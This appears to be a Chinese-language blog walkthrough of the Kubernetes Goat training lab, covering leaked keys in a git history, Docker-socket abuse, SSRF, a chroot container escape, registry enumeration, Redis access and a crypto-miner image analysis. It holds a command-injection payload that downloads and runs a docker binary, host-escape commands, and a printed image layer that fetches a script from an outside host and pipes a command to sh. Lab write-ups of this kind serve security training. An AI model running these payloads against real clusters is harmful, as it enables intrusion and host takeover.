Kubernetes Goat:Kubernetes 漏洞靶场

代码中的敏感keys(Sensitive keys in codebases)

网站文字写着(翻译后如下):

欢迎使用构建代码服务。 该服务是使用具有 CI/CD 管道和现代工具集(如 Git、Docker、AWS 等)的容器构建的。

给的是一个web,就是代码泄露,里面包含了Sensitive keys

可以通过目录爆破工具dirsearch进行目录爆破,确认是git泄露,再用相应工具泄露

通过git-dumper下载源码

有一个提交,环境变量比较敏感

切换过去

1
2
3
4
5
6
7
8
9
10
11
12
13
$ git checkout d7c173ad183c574109cd5c4c648ffe551755b576
Note: checking out 'd7c173ad183c574109cd5c4c648ffe551755b576'.

You are in 'detached HEAD' state. You can look around, make experimental
changes and commit them, and you can discard any commits you make in this
state without impacting any branches by performing another checkout.

If you want to create a new branch to retain commits you create, you may
do so (now or later) by using -b with the checkout command again. Example:

git checkout -b <new-branch-name>

HEAD is now at d7c173a... Inlcuded custom environmental variables

跟原来比,多了一个隐藏文件.env,一看是aws的一些key

1
2
3
4
5
6
7
$ ls -a
. .. .env .git go.mod go.sum main.go README.md
$ cat .env
[build-code-aws]
aws_access_key_id = AKIVSHD6243H22G1KIDC
aws_secret_access_key = cgGn4+gDgnriogn4g+34ig4bg34g44gg4Dox7c1M
k8s_goat_flag = k8s-goat-51bc78332065561b0c99280f62510bcc

进入pod中

1
2
export POD_NAME=$(kubectl get pods --namespace default -l "app=build-code" -o jsonpath="{.items[0].metadata.name}")
kubectl exec -it $POD_NAME -- sh

执行trufflehog .来分析

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
/app # trufflehog .
~~~~~~~~~~~~~~~~~~~~~
Reason: High Entropy
Date: 2020-11-06 22:39:53
Hash: 7daa5f4cda812faa9c62966ba57ee9047ee6b577
Filepath: .env
Branch: origin/master
Commit: updated the endpoints and routes

@@ -0,0 +1,5 @@
+[build-code-aws]
+aws_access_key_id = AKIVSHD6243H22G1KIDC
+aws_secret_access_key = cgGn4+gDgnriogn4g+34ig4bg34g44gg4Dox7c1M
+k8s_goat_flag = k8s-goat-51bc78332065561b0c99280f62510bcc
+

~~~~~~~~~~~~~~~~~~~~~
~~~~~~~~~~~~~~~~~~~~~
Reason: High Entropy
Date: 2020-11-06 22:39:53
Hash: 7daa5f4cda812faa9c62966ba57ee9047ee6b577
Filepath: go.sum
Branch: origin/master
Commit: updated the endpoints and routes

@@ -1,496 +1,25 @@
-cloud.google.com/go v0.26.0/go.mod h1:aQUYkXzVsufM+DwF1aE+0xfcU+56JwCaLick0ClmMTw=
......
......
......
......
......
......

这个工具可通过pip安装

1
pip install trufflehog

DIND (docker-in-docker) exploitation

这个就是命令注入,之后看到把docker.sock映射到里面了

/var/run/docker.sock是Docker守护进程(Docker daemon)默认监听的Unix域套接字(Unix domain socket),假如被映射到容器内,那么我们就可以跟Docker daemon进行通信,从而执行一些命令

可以通过下载docker静态二进制文件进行利用,下面是查看主机上面有什么镜像

1
127.0.0.1;wget https://download.docker.com/linux/static/stable/x86_64/docker-19.03.9.tgz -O /tmp/docker-19.03.9.tgz && tar -xvzf /tmp/docker-19.03.9.tgz -C /tmp/ ;/tmp/docker/docker -H unix:///custom/docker/docker.sock images

假如利用的话就是拉取指定的后门镜像并运行,运行过程中镜像将宿主机的根目录/挂载到容器内部的/host目录下,便于通过后门容器修改宿主机本地文件(如crontab)来完成逃逸。

在配置文件中也能看到目录映射

Kubernetes (K8S) 中的 SSRF

这是一个内部API代理,5000端口

看到有个metadata-db的东东

不断深入,发现http://metadata-db/latest/secrets/kubernetes-goat

解码一下

1
2
echo "azhzLWdvYXQtY2E5MGVmODVkYjdhNWFlZjAxOThkMDJmYjBkZjljYWI=" | base64 -d
k8s-goat-ca90ef85db7a5aef0198d02fb0df9cab

容器逃逸(Container escape to the host system)

为了适应更复杂的权限需求,从 2.2 版本起 Linux 内核能够进一步将超级用户的权限分解为细颗粒度的单元,这些单元称为 capabilities。例如,capability CAP_CHOWN 允许用户对文件的 UID 和 GID 进行任意修改,即执行 chown 命令。几乎所有与超级用户相关的特权都被分解成了单独的 capability。

在docker中可以使用capsh --print输出各种capability权限

1
2
3
4
5
6
7
8
9
10
root@nsfocus:/# capsh --print
Current: = cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read+ep
Bounding set =cap_chown,cap_dac_override,cap_dac_read_search,cap_fowner,cap_fsetid,cap_kill,cap_setgid,cap_setuid,cap_setpcap,cap_linux_immutable,cap_net_bind_service,cap_net_broadcast,cap_net_admin,cap_net_raw,cap_ipc_lock,cap_ipc_owner,cap_sys_module,cap_sys_rawio,cap_sys_chroot,cap_sys_ptrace,cap_sys_pacct,cap_sys_admin,cap_sys_boot,cap_sys_nice,cap_sys_resource,cap_sys_time,cap_sys_tty_config,cap_mknod,cap_lease,cap_audit_write,cap_audit_control,cap_setfcap,cap_mac_override,cap_mac_admin,cap_syslog,cap_wake_alarm,cap_block_suspend,cap_audit_read
Securebits: 00/0x0/1'b0
secure-noroot: no (unlocked)
secure-no-suid-fixup: no (unlocked)
secure-keep-caps: no (unlocked)
uid=0(root)
gid=0(root)
groups=

通过跟正常的机器输出的权限进行对比,基本没什么差别,这是具有所有权限的root

通过mount命令可以看到挂载了一个/host-system目录

通过df命令也可以看到,只不过我们不确定这是不是挂载的

看名字应该是宿主机目录的,我们ls一下,这看着是整个宿主机的根目录都映射进来了

1
2
3
root@nsfocus:~# ls /host-system/
bin boot cdrom dev etc home lib lib32 lib64 libx32 lost+found media mnt opt proc root run sbin snap srv swap.img sys tmp usr var
root@nsfocus:~#

通过chroot命令,我们可以获取宿主机的执行权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
root@nsfocus:~# chroot /host-system/ bash
root@nsfocus:/# ls
bin boot cdrom dev etc home lib lib32 lib64 libx32 lost+found media mnt opt proc root run sbin snap srv swap.img sys tmp usr var
root@nsfocus:/# docker ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
f0a9afd6f2b6 madhuakula/k8s-goat-info-app "python /app.py" 3 days ago Up 3 days k8s_info-app_internal-proxy-deployment-5d99cbbdf7-wqmgr_default_efb4eb97-4aa0-4da2-9a93-a0a5dc762649_0
628fcee2fd49 madhuakula/k8s-goat-internal-api "docker-entrypoint.s…" 4 days ago Up 4 days k8s_internal-api_internal-proxy-deployment-5d99cbbdf7-wqmgr_default_efb4eb97-4aa0-4da2-9a93-a0a5dc762649_0
df0495417aa4 registry.aliyuncs.com/google_containers/pause:3.4.1 "/pause" 4 days ago Up 4 days k8s_POD_internal-proxy-deployment-5d99cbbdf7-wqmgr_default_efb4eb97-4aa0-4da2-9a93-a0a5dc762649_0
5702cc4cdd60 madhuakula/k8s-goat-system-monitor "gotty -w bash" 4 days ago Up 4 days k8s_system-monitor_system-monitor-deployment-594c89b48f-97rs9_default_081f809d-8199-44bd-8f86-ac6942df3dc8_0
9c1ca7ec8f1a madhuakula/k8s-goat-poor-registry "/entrypoint.sh regi…" 4 days ago Up 4 days k8s_poor-registry_poor-registry-deployment-6746b95974-j9xrw_default_d4820b3b-48f0-4ebb-9657-c24d677c73cb_0
c8993f38a99d madhuakula/k8s-goat-home "/docker-entrypoint.…" 4 days ago Up 4 days k8s_kubernetes-goat-home_kubernetes-goat-home-deployment-757f96b7cd-tq5zh_default_ef99f1cd-b0ff-4d6a-9a2e-6443acba79ee_0
4a7f97587378 madhuakula/k8s-goat-hidden-in-layers "sh -c 'tail -f /dev…" 4 days ago Up 4 days k8s_hidden-in-layers_hidden-in-layers-lbwbn_default_2ab7372a-e434-4cae-8ede-beca97d662ab_0
......
......
......
......
......
......

还可以通过kubectl控制,查看集群(这里需要指定配置文件)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
root@nsfocus:/# kubectl --kubeconfig /etc/kubernetes/kubelet.conf get pods
NAME READY STATUS RESTARTS AGE
batch-check-job-mrd2q 0/1 Completed 0 4d4h
build-code-deployment-99d5f65db-hxllz 1/1 Running 0 4d4h
health-check-deployment-66c59d7f6f-qf5b7 1/1 Running 0 4d4h
hidden-in-layers-lbwbn 1/1 Running 0 4d4h
internal-proxy-deployment-5d99cbbdf7-wqmgr 2/2 Running 0 3d23h
kubernetes-goat-home-deployment-757f96b7cd-tq5zh 1/1 Running 0 4d4h
metadata-db-77987b74b-2tqjr 1/1 Running 0 4d4h
poor-registry-deployment-6746b95974-j9xrw 1/1 Running 0 4d4h
system-monitor-deployment-594c89b48f-97rs9 1/1 Running 0 4d4h
root@nsfocus:/# kubectl --kubeconfig /etc/kubernetes/kubelet.conf get nodes
NAME STATUS ROLES AGE VERSION
k8s-master Ready control-plane,master 4d20h v1.21.13
nsfocus Ready <none> 4d20h v1.21.13

我们查看一下部署的yaml文件,可以看到除了挂载根目录到/host-system,securityContext那里还有allowPrivilegeEscalation: true和privileged: true,这两个可是很危险的,跟docker的–privileged

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
root@k8s-master:~/kubernetes-goat/scenarios/system-monitor# cat deployment.yaml 
apiVersion: v1
kind: Secret
metadata:
name: goatvault
type: Opaque
data:
k8sgoatvaultkey: azhzLWdvYXQtY2QyZGEyNzIyNDU5MWRhMmI0OGVmODM4MjZhOGE2YzM=

---
apiVersion: apps/v1
kind: Deployment
......
......
......
volumes:
- name: host-filesystem
hostPath:
path: /
containers:
- name: system-monitor
image: madhuakula/k8s-goat-system-monitor
resources:
limits:
memory: "50Mi"
cpu: "20m"
securityContext:
allowPrivilegeEscalation: true
privileged: true
ports:
- containerPort: 8080
volumeMounts:
- name: host-filesystem
mountPath: /host-system
......
......
......

Docker CIS 基准分析

CIS即Center for Internet Security (CIS) 为安全基准计划提供了定义明确、公正、基于一致性的行业最佳实践来帮助组织评估和增强其安全性

Docker Bench for Security是一款脚本工具,用于检查围绕在生产环境中部署Docker容器的数十种常见最佳实践。github地址:https://github.com/docker/docker-bench-security

首先部署 Docker CIS 基准测试的容器

1
kubectl apply -f scenarios/docker-bench-security/deployment.yaml

进入容器

1
kubectl exec -it docker-bench-security-XXXXX -- sh

执行~/docker-bench-security中的docker-bench-security.sh即可执行检查

其实上面的scenarios/docker-bench-security/deployment.yaml是将一些宿主机目录映射到容器中,从而执行的检查。

所以我们也可以直接从github下载脚本到宿主机进行检查

Kubernetes CIS 基准分析

上面是docker,这次是Kubernetes,github地址:https://github.com/aquasecurity/kube-bench

两个命令部署即可

1
2
3
kubectl apply -f scenarios/kube-bench-security/node-job.yaml

kubectl apply -f scenarios/kube-bench-security/master-job.yaml

查看yaml,两个执行的命令分别是command: ["kube-bench", "node"]command: ["kube-bench", "master"]

不过我看github上的yaml的command已经有所改变

1
2
3
4
# https://github.com/aquasecurity/kube-bench/blob/main/job-master.yaml
command: ["kube-bench", "run", "--targets", "master"]
# https://github.com/aquasecurity/kube-bench/blob/main/job-node.yaml
command: ["kube-bench", "run", "--targets", "node"]

执行后可以看到jobs多了一个kube-bench-node

1
2
3
4
5
6
7
root@k8s-master:~/kubernetes-goat# kubectl apply -f scenarios/kube-bench-security/node-job.yaml
job.batch/kube-bench-node created
root@k8s-master:~/kubernetes-goat# kubectl get jobs
NAME COMPLETIONS DURATION AGE
batch-check-job 1/1 36s 4d6h
hidden-in-layers 0/1 4d6h 4d6h
kube-bench-node 0/1 14s 14s

不过通过查看pod的状态是Error

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
root@k8s-master:~/kubernetes-goat# kubectl get pods
NAME READY STATUS RESTARTS AGE
batch-check-job-mrd2q 0/1 Completed 0 4d6h
build-code-deployment-99d5f65db-hxllz 1/1 Running 0 4d6h
docker-bench-security-dvlgz 1/1 Running 0 61m
health-check-deployment-66c59d7f6f-qf5b7 1/1 Running 0 4d6h
hidden-in-layers-lbwbn 1/1 Running 0 4d6h
internal-proxy-deployment-5d99cbbdf7-wqmgr 2/2 Running 0 4d1h
kube-bench-node-44mxv 0/1 Error 0 12m
kube-bench-node-8vf74 0/1 Error 0 10m
kube-bench-node-lfnmt 0/1 Error 0 8m10s
kube-bench-node-nmfn8 0/1 Error 0 10m
kube-bench-node-t67b8 0/1 Error 0 11m
kube-bench-node-xnlvw 0/1 Error 0 5m30s
kube-bench-node-zb54v 0/1 Error 0 9m30s
kubernetes-goat-home-deployment-757f96b7cd-tq5zh 1/1 Running 0 4d6h
metadata-db-77987b74b-2tqjr 1/1 Running 0 4d6h
poor-registry-deployment-6746b95974-j9xrw 1/1 Running 0 4d6h
system-monitor-deployment-594c89b48f-97rs9 1/1 Running 0 4d6h

后面修改command后再试

1
2
3
4
root@k8s-master:~/kubernetes-goat# kubectl delete -f ./scenarios/kube-bench-security/node-job.yaml 
job.batch "kube-bench-node" deleted
root@k8s-master:~/kubernetes-goat# kubectl apply -f ./scenarios/kube-bench-security/node-job.yaml
job.batch/kube-bench-node created

便可以了,所以还是得用最新的配置文件

1
2
3
4
5
6
7
8
9
10
11
12
13
root@k8s-master:~/kubernetes-goat# kubectl get pods
NAME READY STATUS RESTARTS AGE
batch-check-job-mrd2q 0/1 Completed 0 4d6h
build-code-deployment-99d5f65db-hxllz 1/1 Running 0 4d6h
docker-bench-security-dvlgz 1/1 Running 0 63m
health-check-deployment-66c59d7f6f-qf5b7 1/1 Running 0 4d6h
hidden-in-layers-lbwbn 1/1 Running 0 4d6h
internal-proxy-deployment-5d99cbbdf7-wqmgr 2/2 Running 0 4d1h
kube-bench-node-8xndd 0/1 Completed 0 68s
kubernetes-goat-home-deployment-757f96b7cd-tq5zh 1/1 Running 0 4d6h
metadata-db-77987b74b-2tqjr 1/1 Running 0 4d6h
poor-registry-deployment-6746b95974-j9xrw 1/1 Running 0 4d6h
system-monitor-deployment-594c89b48f-97rs9 1/1 Running 0 4d6h

可以通过logs查看审计的log

1
kubectl logs -f kube-bench-XXX-xxxxx

攻击私有仓库(Attacking private registry)

通过访问/v2/_catalog可以获取所有repositories

1
2
$ curl http://192.168.2.174:1235/v2/_catalog
{"repositories":["madhuakula/k8s-goat-alpine","madhuakula/k8s-goat-users-repo"]}

获取第二个镜像的信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
$ curl http://192.168.2.174:1235/v2/madhuakula/k8s-goat-users-repo/manifests/latest
{
"schemaVersion": 1,
"name": "madhuakula/k8s-goat-users-repo",
"tag": "latest",
"architecture": "amd64",
"fsLayers": [
{
"blobSum": "sha256:a3ed95caeb02ffe68cdd9fd84406680ae93d633cb16422d00e8a7c22955b46d4"
},
{
"blobSum": "sha256:536ef5475913f0235984eb7642226a99ff4a91fa474317faa45753e48e631bd0"
},
......
......
......
......
......
......

从中有环境变量信息

NodePort暴露服务

NodePort在集群中的主机节点上为Service提供一个代理端口,以允许从主机网络上对Service进行访问。

这里是本地搭建的,没有公网ip,所以也就没有外部IP——EXTERNAL-IP

1
2
3
4
$ kubectl get nodes -o wide
NAME STATUS ROLES AGE VERSION INTERNAL-IP EXTERNAL-IP OS-IMAGE KERNEL-VERSION CONTAINER-RUNTIME
k8s-master Ready control-plane,master 4d23h v1.21.13 192.168.2.174 <none> Ubuntu 20.04.2 LTS 5.4.0-72-generic docker://20.10.16
nsfocus Ready <none> 4d23h v1.21.13 192.168.2.172 <none> Ubuntu 20.04.2 LTS 5.4.0-72-generic docker://20.10.16

默认情况下,NodePort的端口范围是 30000-32767,使用nmap扫描,这里就以内网ip为例了

1
2
3
4
5
6
7
8
9
10
$ nmap -T4 -p 30000-32767 192.168.2.172
Starting Nmap 7.80 ( https://nmap.org ) at 2022-06-20 18:57 CST
Nmap scan report for 192.168.2.172
Host is up (0.0055s latency).
Not shown: 2767 closed ports
PORT STATE SERVICE
30003/tcp open amicon-fpsu-ra
MAC Address: 00:50:56:A2:18:00 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.50 seconds

可以看到是30003端口

1
2
$ curl http://192.168.2.172:30003/
{"info": "Refer to internal http://metadata-db for more information"}

Helm v2 tiller to PwN the cluster[已弃用]

这已经从 Kubernetes Goat 启弃用,但是还可以看一下

Helm 是 Kubernetes 部署和管理应用程序的包管理器,默认配置和设置是不安全的,如果攻击者可以访问任何一个 pod 并且没有网络安全策略 (NSP),攻击者可以获得完整的集群访问权限和接管集群管理员权限。

启动环境

1
kubectl run --rm --restart=Never -it --image=madhuakula/k8s-goat-helm-tiller -- bash

默认情况下,helm 版本 2 有一个 tiller 组件,它具有完整的集群管理 RBAC 权限

这个暂时有点问题,不能实践,就是默认不允许执行kubectl get secrets -n kube-system,通过 helm 和 tiller 服务的帮助下部署pwnchart,它将授予所有默认服务帐户 cluster-admin 访问权限,从而可以执行kubectl get secrets -n kube-system

分析挖矿容器(Analysing crypto miner container)

一般我们从 Docker Hub 等公共容器仓库下载镜像,黑客可能通过上传运行挖矿程序的镜像到仓库来让用户帮忙挖矿。

先查看 Kubernetes 集群中的 jobs

1
2
3
4
5
$ kubectl get jobs -A
NAMESPACE NAME COMPLETIONS DURATION AGE
default batch-check-job 1/1 36s 5d5h
default hidden-in-layers 0/1 5d5h 5d5h
default kube-bench-node 1/1 29s 22h

kube-bench-node是之前node的基线检查

获取job的信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
$ kubectl describe job batch-check-job
Name: batch-check-job
Namespace: default
Selector: controller-uid=2ef52301-70c7-48f1-8df7-9319674f2ca7
Labels: controller-uid=2ef52301-70c7-48f1-8df7-9319674f2ca7
job-name=batch-check-job
Annotations: <none>
Parallelism: 1
Completions: 1
Start Time: Thu, 16 Jun 2022 10:53:35 +0800
Completed At: Thu, 16 Jun 2022 10:54:11 +0800
Duration: 36s
Pods Statuses: 0 Running / 1 Succeeded / 0 Failed
Pod Template:
Labels: controller-uid=2ef52301-70c7-48f1-8df7-9319674f2ca7
job-name=batch-check-job
Containers:
batch-check:
Image: madhuakula/k8s-goat-batch-check
Port: <none>
Host Port: <none>
Environment: <none>
Mounts: <none>
Volumes: <none>
Events: <none>

获取job对应的pods

1
2
3
$ kubectl get pods --namespace default -l "job-name=batch-check-job"
NAME READY STATUS RESTARTS AGE
batch-check-job-mrd2q 0/1 Completed 0 5d5h

以yaml格式输出pod的信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
$ kubectl get pod batch-check-job-mrd2q -o yaml
apiVersion: v1
kind: Pod
metadata:
creationTimestamp: "2022-06-16T02:53:35Z"
generateName: batch-check-job-
labels:
controller-uid: 2ef52301-70c7-48f1-8df7-9319674f2ca7
job-name: batch-check-job
name: batch-check-job-mrd2q
namespace: default
ownerReferences:
- apiVersion: batch/v1
blockOwnerDeletion: true
controller: true
kind: Job
name: batch-check-job
uid: 2ef52301-70c7-48f1-8df7-9319674f2ca7
resourceVersion: "72916"
uid: 27657ad4-4fa9-48d0-bdd8-c131137ac3d2
spec:
containers:
- image: madhuakula/k8s-goat-batch-check
imagePullPolicy: Always
name: batch-check
resources: {}
terminationMessagePath: /dev/termination-log
terminationMessagePolicy: File
volumeMounts:
- mountPath: /var/run/secrets/kubernetes.io/serviceaccount
name: kube-api-access-pdfwk
readOnly: true
dnsPolicy: ClusterFirst
enableServiceLinks: true
nodeName: nsfocus
preemptionPolicy: PreemptLowerPriority
priority: 0
restartPolicy: Never
schedulerName: default-scheduler
securityContext: {}
serviceAccount: default
serviceAccountName: default
terminationGracePeriodSeconds: 30
tolerations:
- effect: NoExecute
key: node.kubernetes.io/not-ready
operator: Exists
tolerationSeconds: 300
- effect: NoExecute
key: node.kubernetes.io/unreachable
operator: Exists
tolerationSeconds: 300
volumes:
- name: kube-api-access-pdfwk
projected:
defaultMode: 420
sources:
- serviceAccountToken:
expirationSeconds: 3607
path: token
- configMap:
items:
- key: ca.crt
path: ca.crt
name: kube-root-ca.crt
- downwardAPI:
items:
- fieldRef:
apiVersion: v1
fieldPath: metadata.namespace
path: namespace
status:
conditions:
- lastProbeTime: null
lastTransitionTime: "2022-06-16T02:53:35Z"
reason: PodCompleted
status: "True"
type: Initialized
- lastProbeTime: null
lastTransitionTime: "2022-06-16T02:53:35Z"
reason: PodCompleted
status: "False"
type: Ready
- lastProbeTime: null
lastTransitionTime: "2022-06-16T02:53:35Z"
reason: PodCompleted
status: "False"
type: ContainersReady
- lastProbeTime: null
lastTransitionTime: "2022-06-16T02:53:35Z"
status: "True"
type: PodScheduled
containerStatuses:
- containerID: docker://3c724beda2e350f66c3e1845535a2b62f03f3678070ac6d290c39ee7462feb1f
image: madhuakula/k8s-goat-batch-check:latest
imageID: docker-pullable://madhuakula/k8s-goat-batch-check@sha256:5be381d47c086a0b74bbcdefa5f3ba0ebb78c8acbd2c07005346b5ff687658ef
lastState: {}
name: batch-check
ready: false
restartCount: 0
started: false
state:
terminated:
containerID: docker://3c724beda2e350f66c3e1845535a2b62f03f3678070ac6d290c39ee7462feb1f
exitCode: 0
finishedAt: "2022-06-16T02:54:11Z"
reason: Completed
startedAt: "2022-06-16T02:54:11Z"
hostIP: 192.168.2.172
phase: Succeeded
podIP: 10.244.1.4
podIPs:
- ip: 10.244.1.4
qosClass: BestEffort
startTime: "2022-06-16T02:53:35Z"

batch-check-job使用的是madhuakula/k8s-goat-batch-check镜像

1
2
3
4
5
$ kubectl get pod batch-check-job-mrd2q -o yaml | grep image
- image: madhuakula/k8s-goat-batch-check
imagePullPolicy: Always
image: madhuakula/k8s-goat-batch-check:latest
imageID: docker-pullable://madhuakula/k8s-goat-batch-check@sha256:5be381d47c086a0b74bbcdefa5f3ba0ebb78c8acbd2c07005346b5ff687658ef

我们可以通过docker history查看image每一层所执行的命令,--no-trunc是不要截断输出
(下面这个需要在node执行,因为只有在node有这个镜像)

1
2
3
4
5
6
7
$ docker history --no-trunc madhuakula/k8s-goat-batch-check
IMAGE CREATED CREATED BY SIZE COMMENT
sha256:cb43bcb572b74468336c6854282c538e9ac7f2efc294aa3e49ce34fab7a275c7 5 weeks ago CMD ["ps" "auxx"] 0B buildkit.dockerfile.v0
<missing> 5 weeks ago RUN /bin/sh -c apk add --no-cache htop curl ca-certificates && echo "curl -sSL https://madhuakula.com/kubernetes-goat/k8s-goat-a5e0a28fa75bf429123943abedb065d1 && echo 'id' | sh " > /usr/bin/system-startup && chmod +x /usr/bin/system-startup && rm -rf /tmp/* # buildkit 2.96MB buildkit.dockerfile.v0
<missing> 5 weeks ago LABEL MAINTAINER=Madhu Akula INFO=Kubernetes Goat 0B buildkit.dockerfile.v0
<missing> 2 months ago /bin/sh -c #(nop) CMD ["/bin/sh"] 0B
<missing> 2 months ago /bin/sh -c #(nop) ADD file:5d673d25da3a14ce1f6cf66e4c7fd4f4b85a3759a9d93efb3fd9ff852b5b56e4 in / 5.57MB

可以看到执行了这个可疑的命令

1
/bin/sh -c apk add --no-cache htop curl ca-certificates    && echo "curl -sSL https://madhuakula.com/kubernetes-goat/k8s-goat-a5e0a28fa75bf429123943abedb065d1 && echo 'id' | sh " > /usr/bin/system-startup     && chmod +x /usr/bin/system-startup     && rm -rf /tmp/*

Kubernetes 命名空间绕过(Kubernetes namespaces bypass)

Kubernetes 中有不同的命名空间并且资源被部署和管理时,它们是安全的并且无法相互访问。

默认情况下,Kubernetes 使用平面网络架构,这意味着集群中的任何 pod/服务都可以与其他人通信。

默认情况下,集群内的命名空间没有任何网络安全限制。命名空间中的任何人都可以与其他命名空间通信。

启动环境

1
kubectl run --rm -it hacker-container --image=madhuakula/hacker-container -- sh

先编辑vi /etc/zmap/blacklist.conf,注释里面的10.0.0.0/8这一行,不然不能扫描

1
zmap -p 6379 10.0.0.0/8 -o results.csv
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
~ # ifconfig 
eth0 Link encap:Ethernet HWaddr 76:20:B2:1E:01:E8
inet addr:10.244.1.31 Bcast:10.244.1.255 Mask:255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU:1450 Metric:1
RX packets:2583424 errors:0 dropped:0 overruns:0 frame:0
TX packets:22995250 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:181718935 (173.2 MiB) TX bytes:1229657656 (1.1 GiB)

lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
UP LOOPBACK RUNNING MTU:65536 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)

~ # cat results.csv | grep 10.244
10.244.1.5
1
2
3
4
5
~ # redis-cli -h 10.244.1.5
10.244.1.5:6379> KEYS *
1) "SECRETSTUFF"
10.244.1.5:6379> GET SECRETSTUFF
"k8s-goat-a5a3e446faafa9d0514b3ff396ab8a40"

这其实在现实中就是redis未授权访问,Redis服务器假如以root身份运行,黑客就能够给root账户写入SSH公钥文件,然后直接通过SSH登录目标受害的服务器

获取环境信息

通过/proc/self/cgroup 文件可以获取到docker容器的id

1
2
3
4
5
6
7
8
9
10
11
12
13
14
root@nsfocus:/home# cat /proc/self/cgroup  
12:blkio:/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942df3dc8.slice/docker-5702cc4cdd60529077900ade9f40bd131b05e814893487dd94b8084aebd0aac0.scope
11:pids:/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942df3dc8.slice/docker-5702cc4cdd60529077900ade9f40bd131b05e814893487dd94b8084aebd0aac0.scope
10:rdma:/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942df3dc8.slice/docker-5702cc4cdd60529077900ade9f40bd131b05e814893487dd94b8084aebd0aac0.scope
9:devices:/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942df3dc8.slice/docker-5702cc4cdd60529077900ade9f40bd131b05e814893487dd94b8084aebd0aac0.scope
8:freezer:/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942df3dc8.slice/docker-5702cc4cdd60529077900ade9f40bd131b05e814893487dd94b8084aebd0aac0.scope
7:perf_event:/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942df3dc8.slice/docker-5702cc4cdd60529077900ade9f40bd131b05e814893487dd94b8084aebd0aac0.scope
6:cpuset:/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942df3dc8.slice/docker-5702cc4cdd60529077900ade9f40bd131b05e814893487dd94b8084aebd0aac0.scope
5:hugetlb:/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942df3dc8.slice/docker-5702cc4cdd60529077900ade9f40bd131b05e814893487dd94b8084aebd0aac0.scope
4:memory:/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942df3dc8.slice/docker-5702cc4cdd60529077900ade9f40bd131b05e814893487dd94b8084aebd0aac0.scope
3:net_cls,net_prio:/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942df3dc8.slice/docker-5702cc4cdd60529077900ade9f40bd131b05e814893487dd94b8084aebd0aac0.scope
2:cpu,cpuacct:/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942df3dc8.slice/docker-5702cc4cdd60529077900ade9f40bd131b05e814893487dd94b8084aebd0aac0.scope
1:name=systemd:/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942df3dc8.slice/docker-5702cc4cdd60529077900ade9f40bd131b05e814893487dd94b8084aebd0aac0.scope
0::/kubepods.slice/kubepods-pod081f809d_8199_44bd_8f86_ac6942df3dc8.slice/docker-5702cc4cdd60529077900ade9f40bd131b05e814893487dd94b8084aebd0aac0.scope

可以通过在node执行ps看到

1
2
$ docker ps -a | grep 5702
5702cc4cdd60 madhuakula/k8s-goat-system-monitor "gotty -w bash" 6 days ago Up 6 days k8s_system-monitor_system-monitor-deployment-594c89b48f-97rs9_default_081f809d-8199-44bd-8f86-ac6942df3dc8_0

其他的信息收集

1
2
3
4
5
6
7
cat /proc/self/cgroup
cat /etc/hosts
# 挂载信息
mount
# 查看文件系统
ls -la /home/
printenv或者直接env

在环境变量中就有flag了

DOS内存或CPU等资源

假如Kubernetes部署的yaml文件没有对资源的使用进行限制,那么攻击者可能就可以消耗pod/deployment的资源,从而对Kubernetes造成DOS

这里使用stress-ng压力测试程序来测试

先看看初始资源占用情况,cpu是0,内存是不超过10M

1
2
3
$ docker stats --no-stream | grep hunger
842e3f0c146a k8s_hunger-check_hunger-check-deployment-56d65977f6-k68g9_big-monolith_8bd7722d-bdf5-4230-9265-1447b8317e0d_0 0.00% 6.609MiB / 15.64GiB 0.04% 0B / 0B 0B / 0B 8
